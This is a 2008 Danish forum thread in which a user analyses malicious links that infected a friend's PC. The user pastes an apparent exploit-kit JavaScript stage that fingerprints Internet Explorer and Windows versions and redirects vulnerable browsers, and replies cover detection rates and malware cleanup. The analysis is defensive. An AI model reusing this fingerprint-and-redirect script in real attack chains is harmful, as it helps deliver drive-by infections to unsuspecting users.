|
| Er der nogen med tjek på IE sårbarheder, d~ Fra : Stig Johansen |
Dato : 20-02-08 05:31 |
|
Hej alle.
Jeg er i gang med at hjælpe en kammerat med dels at undersøge nogle malware
links, men også hvorfor han evt. har været inficeret uden hans vidende.
Fælles for de links vi har kigget på er, at det lander ud i en eller anden
side, der enten opfordrer til download af 'cleaner software', eller et
codec man mangler for at vise en film.
2 ud af disse 3 gik direkte til download via diverse 302 moved + js osv, men
det tredje stoppede undervejs.
Et mellemled i 'transporten' var en slags 'krypteret' sj, nærmest analogt
med base 64.
Jeg tager hele scriptet med her, det er ikke så forfærdelig langt:
if (navigator.appName=="Microsoft Internet Explorer")
{
var ExploitNumber=1;
var IEversion=navigator.appVersion;
var IEplatform=navigator.platform;
if (IEplatform.search("Win32") != -1) {
var WinOS=Get_Win_Version(IEversion);
PatchList = clientInformation.appMinorVersion;
switch (WinOS)
{
case "wXPw":
XP_SP2_patched=0;
FullVersion=clientInformation.appMinorVersion;
PatchList=FullVersion.split(";");
for (var i=0; i < PatchList.length; i++) {
if (PatchList[i]=="SP2") {
XP_SP2_patched=1; }
}
if (XP_SP2_patched==1 ) {
ExploitNumber=9;
} else { ExploitNumber=9; }
break;
case "w2Kw":
ExploitNumber=9;
break;
case "w2K3w":
ExploitNumber=9;
break;
case "wNTw":
ExploitNumber=9;
break;
case "w95w":
ExploitNumber=1;
break;
case "w98w":
ExploitNumber=1;
break;
case "wMEw":
ExploitNumber=1;
break;
default:
ExploitNumber=9;
break;
}
switch (ExploitNumber)
{
case 1:
break;
case 9:
location.href="/_dqrgbzgt/2099sxeehqsm.htm";
break;
default:
break;
}
}
}
function Get_Win_Version(IE_vers)
{
if (IE_vers.indexOf('Windows NT 5.1') != -1) return "wXPw"
if (IE_vers.indexOf('Windows NT 5.2') != -1) return "w2K3w"
if (IE_vers.indexOf('Windows NT 5.0') != -1) return "w2Kw"
if (IE_vers.indexOf('Windows NT 4') != -1) return "wNTw"
if (IE_vers.indexOf('Windows 95') != -1) return "w95w"
if (IE_vers.indexOf('Windows 98') != -1) return "w98w"
if (IE_vers.indexOf('Win 9x 4.9') != -1) return "wMEw"
}
Det interessante her er at ved 'ExploitNumber = 1, stopper scriptet.
Det er årsagen til min nysgerrighed.
Der er tilsyneladende udvalgt 'sårbare' versioner, men hvilken sårbarhed er
det man udnytter?
Kan det tænkes, at sårbarheden går ud på, at 'skidtet' enten downloader,
eller måske kører den .exe - fil, man i sidste ende lander på?
Altså, at man ad den vej kan blive inficeret uden at vide det?
Der er formentlig tale om relativt nye exploits - ved en upload til
virustotal.com på den ene, er det kun 9 ud af 32, der finder den.
--
Med venlig hilsen
Stig Johansen
| |
Kent Friis (20-02-2008)
| Kommentar Fra : Kent Friis |
Dato : 20-02-08 08:47 |
|
Den Wed, 20 Feb 2008 05:30:45 +0100 skrev Stig Johansen:
>
> Der er formentlig tale om relativt nye exploits - ved en upload til
> virustotal.com på den ene, er det kun 9 ud af 32, der finder den.
Det kan du ikke regne med. Jeg mener McAfee fandt 8 ud af 15 sidst
jeg kørte den på min virus-mappe. Den fandt bl.a. ikke LOVELETTER,
som på det tidspunkt var 3-4 år gammel.
Mvh
Kent
--
"So there I was surrounded by all these scary creatures
They were even scarier than what Microsoft call features"
- C64Mafia: Forbidden Forest (Don't Go Walking Slow).
| |
Stig Johansen (20-02-2008)
| Kommentar Fra : Stig Johansen |
Dato : 20-02-08 17:53 |
|
Kent Friis wrote:
> Den Wed, 20 Feb 2008 05:30:45 +0100 skrev Stig Johansen:
>>
>> Der er formentlig tale om relativt nye exploits - ved en upload til
>> virustotal.com på den ene, er det kun 9 ud af 32, der finder den.
>
> Det kan du ikke regne med. Jeg mener McAfee fandt 8 ud af 15 sidst
> jeg kørte den på min virus-mappe. Den fandt bl.a. ikke LOVELETTER,
> som på det tidspunkt var 3-4 år gammel.
Jeg mente ikke nye exploits, men nye varianter af malware.
Jeg fik nok formuleret det lidt forkert, men på virustotal er der tale om
scanning af een fil med 32 antivirus produkter. Det er 9 ud af disse 32
produkter, der finder den uploadede fil positiv.
Der er tale om mistænkelige links fra hans hjemmeside(statistik), jeg lige
'tjekker' inden han klikker på noget.
Med Konqueror sat op som IE6/XP får man _hele_ oplevelsen selv (bortset fra
aktivering af .exe filen).
Kan absolut anbefales ;)
Spørgsmålet gik mere på om man (stadig?) kan aktivere en .exe fil på IE uden
at klikke ok.
Men jeg har lige kørt den med fake viriusscanning igen, og der er
fuldstændig ligegyldigt hvor og på hvad man klikker, så åbner den et vindue
med .exe filen. Så det kan tænkes, at man har _troet_ man har klikket på
'ignore' og aktiveret exe filen den vej.
--
Med venlig hilsen
Stig Johansen
| |
Bjarke Andersen (20-02-2008)
| Kommentar Fra : Bjarke Andersen |
Dato : 20-02-08 08:55 |
|
Stig Johansen <stig_johansen_it_at_=(@)hotmail.com> crashed Echelon
writing news:47bbad07$0$90272$14726298@news.sunsite.dk:
> Jeg er i gang med at hjælpe en kammerat med dels at undersøge nogle
> malware links, men også hvorfor han evt. har været inficeret uden hans
> vidende.
>
> Fælles for de links vi har kigget på er, at det lander ud i en eller
> anden side, der enten opfordrer til download af 'cleaner software',
> eller et codec man mangler for at vise en film.
Der er mange årsager til han er blevet smittet. Han kan have hentet et
program der viser sig at indeholde mal-ware som, eller via exploit i hans
browser.
Umiddelbart din beskrivelse lyder som en Browser Helper Object eller
program installeret. Dvs enten startes mal-ware programmet af windows eller
af browseren.
BHO kan "nemt" findes og identificeres vha Hijack-This, og så ellers få
scannet med flere forskellige antivira programmer.
Selv plejer jeg med genstridige filer, dvs dem som ikke kan slettes, eller
hvor mal-ware har mulighed for at geninstallere sig selv fordi der stadig
kører bidder af servicen, lave en liste over inficerede filer, derefter
anvende Ultimate Boot CDs Avira NTFS4DOS og slette dem den vej igennem.
Der findes sikkert andre mere brugervenlig metoder.
--
Bjarke Andersen
| |
|
|